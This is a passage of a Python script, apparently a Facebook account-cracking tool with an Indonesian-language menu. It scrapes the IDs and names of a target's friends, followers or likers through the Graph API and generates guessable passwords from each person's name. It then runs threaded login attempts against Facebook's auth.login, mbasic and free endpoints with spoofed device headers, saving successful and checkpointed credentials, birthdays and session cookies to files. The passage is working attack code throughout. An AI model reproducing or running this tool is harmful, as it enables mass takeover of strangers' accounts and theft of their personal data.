        except (KeyError,IOError):
            jalan("\n%s╔══[ %sFailed to Change User Agent %s]"%(M,P,M))
            print('%s║'%(M))
            input('%s╚══[ %sBack %s]%s'%(M,P,M,P))
            menu()
    elif pmu in ['3','03','003','c']:
        ugen_hp()
    elif pmu in ['4','04','004','d']:
        os.system("rm -rf ugent.txt")
        jalan("%s╠══[ %sUser Agent Deleted Successfully %s]"%(O,P,O))
        print('%s║'%(O))
        input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
        menu()
    elif pmu in ['5','05','005','e']:
        try:
            ungser = open('ugent.txt', 'r').read()
        except (KeyError,IOError):
            ungser = 'Not Found'
        print("%s╚══[%s•%s] %sYour User Agent  : \n\n%s%s"%(O,P,O,P,O,ungser))
        jalan("\n%s╔══[ %sThis is your current user agent %s]"%(O,P,O))
        print('%s║'%(O))
        input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
        menu()
    elif pmu in ['0','00','000','f']:
        menu()
    else:
        jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
def ugen_hp():
    os.system("rm -rf ugent.txt")
    print('%s╠══[%s1%s] %sXiaomi'%(O,P,O,P))
    print('%s╠══[%s2%s] %sNokia'%(O,P,O,P))
    print('%s╠══[%s3%s] %sAsus'%(O,P,O,P))
    print('%s╠══[%s4%s] %sHuawei'%(O,P,O,P))
    print('%s╠══[%s5%s] %sVivo'%(O,P,O,P))
    print('%s╠══[%s6%s] %sOppo'%(O,P,O,P))
    print('%s╠══[%s7%s] %sSamsung'%(O,P,O,P))
    print('%s╠══[%s8%s] %sWindows'%(O,P,O,P))
    pc = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
    print('%s║'%(O))
    if pc in['']:jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P));menu()
    elif pc in ['1','01']:
        ugent = open('ugent.txt','w');ugent.write(ua_xiaomi);ugent.close()
    elif pc in ['2','02']:
        ugent = open('ugent.txt','w');ugent.write(ua_nokia);ugent.close()
    elif pc in ['3','03']:
        ugent = open('ugent.txt','w');ugent.write(ua_asus);ugent.close()
    elif pc in ['4','04']:
        ugent = open('ugent.txt','w');ugent.write(ua_huawei);ugent.close()
    elif pc in ['5','05']:
        ugent = open('ugent.txt','w');ugent.write(ua_vivo);ugent.close()
    elif pc in ['6','06']:
        ugent = open('ugent.txt','w');ugent.write(ua_oppo);ugent.close()
    elif pc in ['7','07']:
        ugent = open('ugent.txt','w');ugent.write(ua_samsung);ugent.close()
    elif pc in ['8','08']:
        ugent = open('ugent.txt','w');ugent.write(ua_windows);ugent.close()
    else:jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P));menu()
    jalan("%s╠══[ %sSuccessfully Changed User Agent %s]"%(O,P,O))
    print('%s║'%(O))
    input('%s╚══[ %sBack %s]%s'%(O,P,O,P))
    menu()
def publik():
    try:
        lisensi = open("license.txt","r").read()
        wl = requests.get(url_license + lisensi)
        wk = json.loads(wl.text)
        wj = wk['username']
        jid = '5000'
    except (KeyError,IOError):
        jid = '5000'
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        token = open("token.txt","r").read()
        x = requests.get("https://graph.facebook.com/me?access_token=" + token)
        y = json.loads(x.text)
        n = y['name']
    except (KeyError,IOError):
        jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P))
        os.system('rm -rf token.txt')
        menu_log()
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        print('%s╠══[%s•%s] %sINPUT ID'%(O,P,O,P))
        it = input("%s╠══[%s•%s] %sID Target : "%(O,P,O,P))
        try:
            pb = requests.get("https://graph.facebook.com/" + it + "?access_token=" + token)
            ob = json.loads(pb.text)
            print ('%s╠══[%s•%s] %sName : %s'%(O,P,O,P,ob['name']))
        except (KeyError,IOError):
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sID Not Found'%(M,P,M,P))
            menu()
        r = requests.get("https://graph.facebook.com/%s/friends?limit=%s&access_token=%s"%(it,jid,token))
        id = []
        z = json.loads(r.text)
        xc = (ob["first_name"]+".json").replace(" ","_")
        xb = open(xc,"w")
        for a in z["data"]:
            id.append(a["id"]+"•"+a["name"])
            xb.write(a["id"]+"•"+a["name"]+"\n")
        xb.close()
        print('%s╠══[%s•%s] %sTotal ID : %s'%(O,P,O,P,len(id)))
        return crack(xc)
    except Exception as e:
        exit('%s╚══[%s!%s] %sError : %s'%(M,P,M,P,e))
def pengikut():
    try:
        lisensi = open("license.txt","r").read()
        wl = requests.get(url_license + lisensi)
        wk = json.loads(wl.text)
        wj = wk['username']
        jid = '10000'
    except (KeyError,IOError):
        jid = '5000'
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        token = open("token.txt","r").read()
        x = requests.get("https://graph.facebook.com/me?access_token=" + token)
        y = json.loads(x.text)
        n = y['name']
    except (KeyError,IOError):
        jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P))
        os.system('rm -rf token.txt')
        menu_log()
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        print('%s╠══[%s•%s] %sInput ID '%(O,P,O,P))
        it = input("%s╠══[%s•%s] %sID Target : "%(O,P,O,P))
        try:
            pb = requests.get("https://graph.facebook.com/" + it + "?access_token=" + token)
            ob = json.loads(pb.text)
            print ('%s╠══[%s•%s] %sName : %s'%(O,P,O,P,ob['name']))
        except (KeyError,IOError):
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sID Not Found'%(M,P,M,P))
            menu()
        r = requests.get("https://graph.facebook.com/%s/subscribers?limit=%s&access_token=%s"%(it,jid,token))
        id = []
        z = json.loads(r.text)
        xc = (ob["first_name"]+".json").replace(" ","_")
        xb = open(xc,"w")
        for a in z["data"]:
            id.append(a["id"]+"•"+a["name"])
            xb.write(a["id"]+"•"+a["name"]+"\n")
        xb.close()
        print('%s╠══[%s•%s] %sTotal ID : %s'%(O,P,O,P,len(id)))
        return crack(xc)
    except Exception as e:
        exit('%s╚══[%s!%s] %sError : %s'%(M,P,M,P,e))
def likers():
    try:
        lisensi = open("license.txt","r").read()
        wl = requests.get(url_license + lisensi)
        wk = json.loads(wl.text)
        wj = wk['username']
        jid = '10000'
    except (KeyError,IOError):
        jid = '5000'
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        token = open("token.txt","r").read()
        x = requests.get("https://graph.facebook.com/me?access_token=" + token)
        y = json.loads(x.text)
        n = y['name']
    except (KeyError,IOError):
        jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P))
        os.system('rm -rf token.txt')
        menu_log()
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        print('%s╠══[%s•%s] %sINPUT ID'%(O,P,O,P))
        it = input("%s╠══[%s•%s] %sID Target : "%(O,P,O,P))
        try:
            pb = requests.get("https://graph.facebook.com/" + it + "?access_token=" + token)
            ob = json.loads(pb.text)
            print ('%s╠══[%s•%s] %sName : %s'%(O,P,O,P,ob['name']))
        except (KeyError,IOError):
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sID Not Found'%(M,P,M,P))
            menu()
        r = requests.get("https://graph.facebook.com/%s/likes?limit=%s&access_token=%s"%(it,jid,token))
        id = []
        z = json.loads(r.text)
        xc = (ob["first_name"]+".json").replace(" ","_")
        xb = open(xc,"w")
        for a in z["data"]:
            id.append(a["id"]+"•"+a["name"])
            xb.write(a["id"]+"•"+a["name"]+"\n")
        xb.close()
        print('%s╠══[%s•%s] %sTotal ID : %s'%(O,P,O,P,len(id)))
        return crack(xc)
    except Exception as e:
        exit('%s╚══[%s!%s] %sError : %s'%(M,P,M,P,e))
def generate1(_cici_):
    _dapunta_=[]
    for i in _cici_.split(" "):
        if len(i)<3:
            continue
        else:
            i=i.lower()
            if len(i)==3 or len(i)==4 or len(i)==5:
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"786")
                _dapunta_.append(i+"1122")
            elif len(i)>=6:
                _dapunta_.append(i)
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"786")
                _dapunta_.append(i+"1122")
            else:
                continue
    _dapunta_.append(_cici_.lower())
    return _dapunta_
def generate2(_cici_):
    _dapunta_=[]
    for i in _cici_.split(" "):
        if len(i)<3:
            continue
        else:
            i=i.lower()
            if len(i)==3 or len(i)==4 or len(i)==5:
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"1122")
                _dapunta_.append(i+"786")
            else:
                _dapunta_.append(i)
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"1122")
                _dapunta_.append(i+"786")
    _dapunta_.append(_cici_.lower())
    _dapunta_.append("223344")
    _dapunta_.append("556677")
    _dapunta_.append("445566")
    return _dapunta_
def generate3(_cici_):
    _dapunta_=[]
    for i in _cici_.split(" "):
        if len(i)<3:
            continue
        else:
            i=i.lower()
            if len(i)==3 or len(i)==4 or len(i)==5:
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"1122")
                _dapunta_.append(i+"786")
            else:
                _dapunta_.append(i)
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"1122")
                _dapunta_.append(i+"786")
    _dapunta_.append(_cici_.lower())
    _dapunta_.append("pakistan")
    _dapunta_.append("pakistan123")
    _dapunta_.append("786786")
    _dapunta_.append("khankhan")
    _dapunta_.append("223344")
    _dapunta_.append("khan1234")
    return _dapunta_
def generate4(_cici_):
    _dapunta_=[]
    ps = open('pass.txt','r').read()
    pp = open('passangka.txt','r').read()
    for i in _cici_.split(" "):  
        i=i.lower()
        if len(i)<3:continue
        elif len(i)==3 or len(i)==4 or len(i)==5:
            _dapunta_.append(i+"123")
            _dapunta_.append(i+"12345")
            _dapunta_.append(i+"1234")
            _dapunta_.append(i+"1122")
            _dapunta_.append(i+"786")
        else:
            _dapunta_.append(i)
            _dapunta_.append(i+"123")
            _dapunta_.append(i+"12345")
            _dapunta_.append(i+"1234")
            _dapunta_.append(i+"1122")
            _dapunta_.append(i+"786")
    if pp in ['',' ','  ']:pass
    else:
        for i in _cici_.split(" "):  
            i=i.lower()
            for x in pp.split(','):
                _dapunta_.append(i+x)
    if ps in ['',' ','  ']:pass
    else:
        for z in ps.split(','):
            _dapunta_.append(z)
    _dapunta_.append(_cici_.lower())
    return _dapunta_
def tambah_pass():
    print('%s║'%(O))
    print('%s╠══[%s•%s] %sFor Example :  102030,123456,786786'%(O,P,O,P))
    cuy = input('%s╠══[%s•%s] %sEnter Manual Additional Pass [1 Kata] : '%(O,P,O,P))
    gh = open('pass.txt','w')
    gh.write(cuy)
    gh.close
def tambah_pass_angka():
    print('%s╠══[%s•%s] %sFor Example : 321,786,1122,123'%(O,P,O,P))
    coy = input('%s╠══[%s•%s] %sEnter Additional Pass Behind Name : '%(O,P,O,P))
    xy = open('passangka.txt','w')
    xy.write(coy)
    xy.close
    
def log_api(em,pas,hosts):
    ua = open('ugent.txt','r').read()
    r = requests.Session()
    header = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)),
        "x-fb-sim-hni": str(random.randint(20000, 40000)),
        "x-fb-net-hni": str(random.randint(20000, 40000)),
        "x-fb-connection-quality": "EXCELLENT",
        "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA",
        "user-agent": ua,
        "content-type": "application/x-www-form-urlencoded",
        "x-fb-http-engine": "Liger"}
    param = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 
        'format': 'json', 
        'sdk_version': '2', 
        'email': em, 
        'locale': 'en_US', 
        'password': pas, 
        'sdk': 'ios', 
        'generate_session_cookies': '1', 
        'sig':'3f555f99fb61fcd7aa0c44f58f522ef6'}
    api = 'https://b-api.facebook.com/method/auth.login'
    response = r.get(api, params=param, headers=header)
    if 'session_key' in response.text and 'EAAA' in response.text:
        return {"status":"success","email":em,"pass":pas}
    elif 'www.facebook.com' in response.json()['error_msg']:
        return {"status":"cp","email":em,"pass":pas}
    else:return {"status":"error","email":em,"pass":pas}
def log_mbasic(em,pas,hosts):
    ua = open('ugent.txt','r').read()
    r = requests.Session()
    r.headers.update({"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
    p = r.get("https://mbasic.facebook.com/")
    b = bs4.BeautifulSoup(p.text,"html.parser")
    meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
    data={}
    for i in b("input"):
        if i.get("value") is None:
            if i.get("name")=="email":
                data.update({"email":em})
            elif i.get("name")=="pass":
                data.update({"pass":pas})
            else:
                data.update({i.get("name"):""})
        else:
            data.update({i.get("name"):i.get("value")})
    data.update(
        {"fb_dtsg":meta,"m_sess":"","__user":"0",
        "__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
        }
    )
    r.headers.update({"referer":"https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8"})
    po = r.post("https://mbasic.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
    if "c_user" in list(r.cookies.get_dict().keys()):
        return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
    elif "checkpoint" in list(r.cookies.get_dict().keys()):
        return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
    else:return {"status":"error","email":em,"pass":pas}
def log_free(em,pas,hosts):
    ua = open('ugent.txt','r').read()
    r = requests.Session()
    r.headers.update({"Host":"free.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
    p = r.get("https://free.facebook.com/")
    b = bs4.BeautifulSoup(p.text,"html.parser")
    meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
    data={}
    for i in b("input"):
        if i.get("value") is None:
            if i.get("name")=="email":
                data.update({"email":em})
            elif i.get("name")=="pass":
                data.update({"pass":pas})
            else:
                data.update({i.get("name"):""})
        else:
            data.update({i.get("name"):i.get("value")})
    data.update(
        {"fb_dtsg":meta,"m_sess":"","__user":"0",
        "__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
        }
    )
    r.headers.update({"referer":"https://free.facebook.com/login/?next&ref=dbl&fl&refid=8"})
    po = r.post("https://free.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
    if "c_user" in list(r.cookies.get_dict().keys()):
        return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
    elif "checkpoint" in list(r.cookies.get_dict().keys()):
        return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
    else:return {"status":"error","email":em,"pass":pas}
def cek_log(user, pasw, h_cp):
    ua = "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36"
    mb = "https://mbasic.facebook.com"
    ses = requests.Session()
    ses.headers.update({
    "Host": "mbasic.facebook.com",
    "cache-control": "max-age=0",
    "upgrade-insecure-requests": "1",
    "origin": mb,
    "content-type": "application/x-www-form-urlencoded",
    "user-agent": ua,
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "x-requested-with": "mark.via.gp",
    "sec-fetch-site": "same-origin",
    "sec-fetch-mode": "navigate",
    "sec-fetch-user": "?1",
    "sec-fetch-dest": "document",
    "referer": mb+"/login/?next&ref=dbl&fl&refid=8",
    "accept-encoding": "gzip, deflate",
    "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"
    })
    data = {}
    ged = par(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
    fm = ged.find("form",{"method":"post"})
    list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
    for i in fm.find_all("input"):
        if i.get("name") in list:
            data.update({i.get("name"):i.get("value")})
        else:
            continue
    data.update({"email":user,"pass":pasw})
    try:
        run = par(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
    except requests.exceptions.TooManyRedirects:
        print("[!] Redirect Overload")
    if "c_user" in ses.cookies:
        return {"status":"error","email":user,"pass":pasw}
    elif "checkpoint" in ses.cookies:
        form = run.find("form")
        dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
        jzst = form.find("input",{"name":"jazoest"})["value"]
        nh   = form.find("input",{"name":"nh"})["value"]
        dataD = {
            "fb_dtsg": dtsg,
            "fb_dtsg": dtsg,
            "jazoest": jzst,
            "jazoest": jzst,
            "checkpoint_data":"",
            "submit[Continue]":"Lanjutkan",
            "nh": nh
        }
        xnxx = par(ses.post(mb+form["action"], data=dataD).text, "html.parser")
        ngew = [yy.text for yy in xnxx.find_all("option")]
        opsi=[]
        option_dev = []
        for opt in range(len(ngew)):
            option_dev.append("\n     "+P+str(opt+1)+". "+ngew[opt]+" ")
        print(h_cp+"".join(option_dev))
    elif "login_error" in str(run):
        pass
    else:
        pass
def koki(cookies):
    result=[]
    for i in enumerate(cookies.keys()):
        if i[0]==len(cookies.keys())-1:result.append(i[1]+"="+cookies[i[1]])
        else:result.append(i[1]+"="+cookies[i[1]]+"; ")
    sample = "".join(result)
    sam_   = sample.replace(' ','')
    samp_  = sam_.split(';')
    final = ('%s; %s; %s; %s; %s'%(samp_[4],samp_[1],samp_[0],samp_[5],samp_[3]))
    return final
def cek_apk(h_ok,_dapunta_):
    apk = []
    ses_ = requests.Session()
    url = "https://mbasic.facebook.com/settings/apps/tabbed/?tab=active"
    dat_game = ses_.get(url,cookies={'cookie':_dapunta_})
    datagame = par(dat_game.content,'html.parser')
    form_    = datagame.find('form',method='post')
    for asu in form_.find_all("h3"):
        try:
            celeng = asu.find('span').text
            apk.append('\n   • '+celeng)
        except:pass
    url2 = "https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive"
    dat_game = ses_.get(url2,cookies={'cookie':_dapunta_})
    datagame = par(dat_game.content,'html.parser')
    form_    = datagame.find('form',method='post')
    for asu in form_.find_all("h3"):
        try:
            celeng = asu.find('span').text
            apk.append('\n   • '+celeng)
        except:pass
    print(h_ok+''.join(apk))
def tahun(fx):
    if len(fx)==15:
        if fx[:10] in ['1000000000']       :tahunz = ' • 2009'
        elif fx[:9] in ['100000000']       :tahunz = ' • 2009'
        elif fx[:8] in ['10000000']        :tahunz = ' • 2009'
        elif fx[:7] in ['1000000','1000001','1000002','1000003','1000004','1000005']:tahunz = ' • 2009'
        elif fx[:7] in ['1000006','1000007','1000008','1000009']:tahunz = ' • 2010'
        elif fx[:6] in ['100001']          :tahunz = ' • 2010/2011'
        elif fx[:6] in ['100002','100003'] :tahunz = ' • 2011/2012'
        elif fx[:6] in ['100004']          :tahunz = ' • 2012/2013'
        elif fx[:6] in ['100005','100006'] :tahunz = ' • 2013/2014'
        elif fx[:6] in ['100007','100008'] :tahunz = ' • 2014/2015'
        elif fx[:6] in ['100009']          :tahunz = ' • 2015'
        elif fx[:5] in ['10001']           :tahunz = ' • 2015/2016'
        elif fx[:5] in ['10002']           :tahunz = ' • 2016/2017'
        elif fx[:5] in ['10003']           :tahunz = ' • 2018'
        elif fx[:5] in ['10004']           :tahunz = ' • 2019'
        elif fx[:5] in ['10005']           :tahunz = ' • 2020'
        elif fx[:5] in ['10006','10007','10008']:tahunz = ' • 2021'
        else:tahunz=''
    elif len(fx) in [9,10]:
        tahunz = ' • 2008/2009'
    elif len(fx)==8:
        tahunz = ' • 2007/2008'
    elif len(fx)==7:
        tahunz = ' • 2006/2007'
    else:tahunz=''
    return tahunz
class crack:
    def __init__(self,files):
        self.ada = []
        self.cp = []
        self.ko = 0
        print('%s║'%(O))
        print('%s╠══[%s•%s] %sCrack With Password Default/Manual [d/m]'%(O,P,O,P))
        while True:
            f = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
            if f=="":
                jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                menu()
            elif f in ['m','M','2','02','002']:
                try:
                    while True:
                        try:
                            self.apk = files
                            self.fs = open(self.apk).read().splitlines()
                            break
                        except Exception as e:
                            print ("   %s"%(e))
                            continue
                    self.fl = []
                    for i in self.fs:
                        try:
                            self.fl.append({"id":i.split("•")[0]})
                        except:continue
                except Exception as e:
                    print(("   %s"%e))
                    continue
                print('%s╠══[%s•%s] %sFor example : jeeck,786786,123456'%(O,P,O,P))
                self.pwlist()
                break
            elif f in ['d','D','1','01','001']:
                try:
                    while True:
                        try:
                            self.apk = files
                            self.fs = open(self.apk).read().splitlines()
                            break
                        except Exception as e:
                            print ("   %s"%(e))
                            continue
                    self.fl = []
                    start_methodezz()
                    kopi = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                    if kopi in ['']:
                        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                        menu()
                    elif kopi in ['1','01']:
                        for i in self.fs:
                            try:
                                self.fl.append({"id":i.split("•")[0],"pw":generate1(i.split("•")[1])})
                            except:continue
                    elif kopi in ['2','02']:
                        for i in self.fs:
                            try:
                                self.fl.append({"id":i.split("•")[0],"pw":generate2(i.split("•")[1])})
                            except:continue
                    elif kopi in ['3','03']:
                        for i in self.fs:
                            try:
                                self.fl.append({"id":i.split("•")[0],"pw":generate3(i.split("•")[1])})
                            except:continue
                    elif kopi in ['4','04']:
                        os.system('rm -rf pass.txt')
                        os.system('rm -rf passangka.txt')
                        tambah_pass()
                        tambah_pass_angka()
                        for i in self.fs:
                            try:
                                self.fl.append({"id":i.split("•")[0],"pw":generate4(i.split("•")[1])})
                            except:continue
                    else:
                        jalan('%s╚══[%s!%s] %Correct Content'%(M,P,M,P))
                        menu()
                    start_method()
                    put = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                    print('%s║'%(O))
                    if put in ['']:
                        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                        menu()
                    elif put in ['1','01','001','a']:
                        print('%s╠══[%s•%s] %sBring Up  CP Option? [y/t]'%(O,P,O,P))
                        puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                        if puf in ['']:
                            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                            menu()
                        elif puf in ['1','01','001','y','Y']:
                            started()
                            ThreadPool(35).map(self.api_opsi,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        elif puf in ['2','02','002','t','T']:
                            started()
                            ThreadPool(35).map(self.api,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        else:
                            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                            menu()
                    elif put in ['2','02','002','b']:
                        print('%s╠══[%s•%s] %sBring Up  CP Option? [y/t]'%(O,P,O,P))
                        puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                        if puf in ['']:
                            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                            menu()
                        elif puf in ['1','01','001','y','Y']:
                            started()
                            ThreadPool(35).map(self.mbasic_opsi,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        elif puf in ['2','02','002','t','T']:
                            started()
                            ThreadPool(35).map(self.mbasic,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        else:
                            jalan('%s╚══[%s!%s] %Correct Content'%(M,P,M,P))
                            menu()
                    elif put in ['3','03','003','c']:
                        print('%s╠══[%s•%s] %sBring up CP Option? [y/t]'%(O,P,O,P))
                        puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                        if puf in ['']:
                            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                            menu()
                        elif puf in ['1','01','001','y','Y']:
                            started()
                            ThreadPool(35).map(self.free_opsi,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        elif puf in ['2','02','002','t','T']:
                            started()
                            ThreadPool(35).map(self.free,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        else:
                            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                            menu()
                    else:
                        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                        menu()
                except Exception as e:
                    print(("   %s"%e))
    def pwlist(self):
        self.pw = input('%s╠══[%s•%s] %sEnter Password : '%(O,P,O,P)).split(",")
        if len(self.pw) ==0:
            self.pwlist()
        else:
            for i in self.fl:
                i.update({"pw":self.pw})
            start_method()
            put = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
            print('%s║'%(O))
            if put in ['']:
                jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                menu()
            elif put in ['1','01','001','a']:
                print('%s╠══[%s•%s] %sBring up  CP Option? [y/t]'%(O,P,O,P))
                puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                if puf in ['']:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
                elif puf in ['1','01','001','y','Y']:
                    started()
                    ThreadPool(30).map(self.api_opsi,self.fl)
                    os.remove(self.apk)
                    exit()
                elif puf in ['2','02','002','t','T']:
                    started()
                    ThreadPool(30).map(self.api,self.fl)
                    os.remove(self.apk)
                    exit()
                else:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
            elif put in ['2','02','002','b']:
                print('%s╠══[%s•%s] %sBring up CP option? [y/t]'%(O,P,O,P))
                puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                if puf in ['']:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
                elif puf in ['1','01','001','y','Y']:
                    started()
                    ThreadPool(30).map(self.mbasic_opsi,self.fl)
                    os.remove(self.apk)
                    exit()
                elif puf in ['2','02','002','t','T']:
                    started()
                    ThreadPool(30).map(self.mbasic,self.fl)
                    os.remove(self.apk)
                    exit()
                else:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
            elif put in ['3','03','003','c']:
                print('%s╠══[%s•%s] %sBring up CP option? [y/t]'%(O,P,O,P))
                puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                if puf in ['']:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
                elif puf in ['1','01','001','y','Y']:
                    started()
                    ThreadPool(30).map(self.free_opsi,self.fl)
                    os.remove(self.apk)
                    exit()
                elif puf in ['2','02','002','t','T']:
                    started()
                    ThreadPool(30).map(self.free,self.fl)
                    os.remove(self.apk)
                    exit()
                else:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
            else:
                jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                menu()
    def api(self,fl):
        try:
            for i in fl.get("pw"):
                log = log_api(fl.get("id"),
                    i,"https://b-api.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        print("\r%s[%sMARK-OK%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id"))))
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    print("\r%s[%sMARK-CP%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id"))))
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    print("\r%s[%sMARK-OK%s] %s • %s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id"))))
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.api(fl)
    def api_opsi(self,fl):
        try:
            for i in fl.get("pw"):
